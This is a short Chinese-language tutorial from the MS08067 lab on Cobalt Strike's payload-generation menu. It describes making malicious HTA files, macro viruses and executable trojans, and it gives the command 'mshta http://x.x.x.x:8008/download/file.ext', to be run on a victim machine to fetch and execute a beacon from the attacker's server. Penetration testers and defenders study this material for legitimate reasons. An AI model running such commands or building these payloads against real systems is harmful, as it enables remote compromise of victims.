出品|MS08067实验室(www.ms08067.com)
本文作者:BlackCat(Ms08067内网安全小组成员)
BlackCat微信(欢迎骚扰交流):
步骤:Attacks—〉Packages—〉如下:
HTML Application 生成恶意的HTA木马文件
MS Office Macro 生成office宏病毒文件
Payload Gene rator 生成各种语言版本的payload;
Windows Executable 生成可执行exe木马;
Windows Executable⑸ 生成无状态的可执行exe木马。
1、HTML Application
生成恶意的HTA木马文件
—个HTML Application (HTML应用)是一个使用HTML和一个Internet浏览器支持的脚本语言编写的Windows程序。该程序包生成一个HTML应用,该应用运行一个CobaltSt rikepayload。你可以选择可执行的选项来获取一个HTML应用,此HTML应用使得一个可执行文件落地在磁盘上并运行它。
选择PowerShell选项来得到一个HTML应用,该应用使用PowerShell来运行一个payload。使用VBA选项来静默派生一个MicrosoftExcel实例并运行一个恶意的宏来将payload注入到内存中。
生成一个 HTML application
Attacks -> Packages -> Html Application
这里有三种工作方式
executable(生成可执行攻击脚本)
powershell(生成一个powershell的脚本)
VBA(生成一个vba的脚本,使用mshta命令执行)
这里借鉴一个网上的方法,生成一个powershell,因为i两外两种方式上线不成功,然后配合host file使用。
然后会生成一个URL复制到
http://x.x.x.x:8008/download/file.ext
然后在受害者机器上运行
mshta http://x.x.x.x:8008/download/file.ext
然后CS端就可以收到上线了
2、MS Office Macro
该程序包生成一个MicrosoftOffice的宏文件并提供将宏嵌入Microsoft Word或Microsoft Excel的说明。这个参考我钓鱼部分的宏文件制作部分的文章。